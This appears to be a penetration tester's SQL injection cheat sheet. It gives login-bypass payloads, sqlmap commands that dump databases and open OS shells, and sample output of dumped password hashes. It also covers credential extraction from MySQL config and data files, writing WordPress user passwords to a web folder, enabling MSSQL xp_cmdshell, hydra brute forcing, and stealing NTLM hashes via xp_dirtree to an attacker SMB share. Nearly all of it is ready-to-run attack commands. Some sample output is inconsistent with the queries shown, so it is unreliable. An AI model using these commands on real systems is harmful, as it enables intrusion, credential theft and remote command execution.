https://portswigger.net/web-security/sql-injection/cheat-sheet https://www.acunetix.com/blog/articles/exploiting-sql-injection-example/ https://github.com/sqlmapproject/sqlmap/wiki/Usage#uri-injection-point

admin' --
admin' #
admin'/*
' or 1=1--
' or 1=1#
' or 1=1/*
') or '1'='1--
') or ('1'='1—

SQL Injection: SQLMap

# Retrieve Databases (from a request saved with Burp) 
sqlmap -r request_10-86-74-7-login.txt --dbs  

sqlmap -u url/?id= -p id --dbs

sqlmap -u enterprise.htb/?query=1 --batch -D wordpress -T wp_posts --dump

sqlmap -u url --sql-query "SHOW COLUMNS FROM wordpress.wp_posts;"
  
retrieved: smallville  
available databases:  
information_schema  
smallville  
  
# List the tables of a database
sqlmap -r request_10-86-74-7-login.txt -D smallville --tables  
  
Database: smallville  
[2 tables]  
+--------------+  
| users        |  
| product      |  
+--------------+  
  
# Dump data  
sqlmap -r request_10-86-74-7-login.txt -D smallville -T names --dump  
  
Database: smallville  
Table: names  
[2 entries]  
+------------------------------+-------------+  
| hash                         | username    |  
+------------------------------+-------------+  
| AE528135395036076442096      | klark       | 
| AE818524557893270397695      | lois        | 
+------------------------------+-------------+
  
# Running specific queries
sqlmap -r request_10-86-74-7-login.txt --sql-shell  
  
sql-shell> select hash,username from users where hash like 'AE528135395036076442096';  
[11:23:02] [INFO] fetching SQL SELECT statement query output: 'select hash,username from accounts where iban like 'AE528135395036076442096''  
[11:23:02] [INFO] the SQL query provided has more than one field. sqlmap will now unpack it into distinct queries to be able to retrieve the output even if we are going blind  
[11:23:02] [INFO] retrieved: 1  
[11:23:09] [INFO] retrieved: AE528135395036076442096  
[11:30:11] [INFO] retrieved: tom

Add custom payloadd

/usr/share/sqlmap/data/xml/payloads/

Simple usage

sqlmap -u https://site.com/

Automatic GET request parameter

sqlmap -u https://site.com/page?p1=value1&p2=value2

Use POST request

sqlmap -u https://site.com/” --data="p1=value1&p2=value2"

Request file as input (get it from Burpsuite)

sqlmap -r request.txt

Use authenticated session with cookie

sqlmap -u https://site.com/ --cookie="Session_Cookie_Value"

Use authenticated session with auth headers

sqlmap -u https://site.com/ --headers="Authorization: Basic YWxhZGRpbjpvcGVuc2VzYW1l"

Basic authentication

sqlmap -u https://site.com/ --auth-cred=username:password

Custom SQL query

sqlmap -u https://site.com/ --sql-query "select * from xxx;"

Get OS shell

sqlmap -u https://site.com/ --os-shell

Get SQL shell

 sqlmap -u https://site.com/ --sqlmap-shell

Use attack techniques

sqlmap -u https://site.com/ --technique=BEUSTQ

# B: Boolean-based blind
# E: Error-based
# U: Union query-based
# S: Stacked queries
# T: Time-based blind
# Q: Inline queries

SQL

Extract credentials from files

cat /etc/mysql/debian.cnf
grep -oaE "[-_\.\*a-Z0-9]{3,}" /var/lib/mysql/mysql/user.MYD | grep -v "mysql_native_password"

select concat_ws(‘:’, user_login, user_pass) from wp_users into outfile ‘/var/www/https/blogblog/wp-content/uploads/creds.txt’;

blah';exec master..xp_cmdshell 'ping www.site.com -l 65000 -t'; --

wordpress

--sql-query "select id,post_name,post_content,post_excerpt from wp_posts where id=66 limit 0,1;"
--sql-query "select user_login,user_pass from wp_users;"

https://www.asafety.fr/mssql-injection-cheat-sheet/

Brute force

hydra -L <USERS_LIST> -P <PASSWORDS_LIST> <IP> mssql -vV -I -u

MSSQL

nmap --script ms-sql-info,ms-sql-empty-password,ms-sql-xp-cmdshell,ms-sql-config,ms-sql-ntlm-info,ms-sql-tables,ms-sql-hasdbaccess,ms-sql-dac,ms-sql-dump-hashes --script-args mssql.instance-port=1433,mssql.username=sa,mssql.password=,mssql.instance-name=MSSQLSERVER -sV -p 1433 <IP>

We can run the queries in Visual Studio

-- SELECT schema_name
-- FROM information_schema.schemata;

EXEC sp_databases;

SELECT
  *
FROM
  master.INFORMATION_SCHEMA.TABLES
WHERE
  TABLE_TYPE = 'BASE TABLE';
GO

-- db_accessadmin

sqsh

mssqlclient.py sa:xxx@IP
mssqlclient.py -windows-auth <DOMAIN>/<USER>:<PASSWORD>@<IP>
mssqlclient.py <USER>:<PASSWORD>@<IP>

enable xp_cmdshell

EXEC sp_configure 'show advanced options', 1; RECONFIGURE;
EXEC sp_configure 'xp_cmdshell', 1; RECONFIGURE;
xp_cmdshell <command>

Concatenate query result

string_agg(concat(name,':',id).'|')

Steal NTLM hash with mssql

sudo smbserver.py -smb2support liodeus .
SQL> exec master..xp_dirtree '\\<IP>\liodeus\' # Steal the NTLM hash, crack it with john or hashcat

Common issues

In case of continuous data retrieval problems you are advised to try a switch ‘–no-cast’ or switch ‘–hex’

Tell sqlmap EXACTLY how to determine a True response: ‘–string’ and ‘–code’

–string => Specify portion of text returned in HTTP Response when the query is true –code => HTTP status code returned when query is true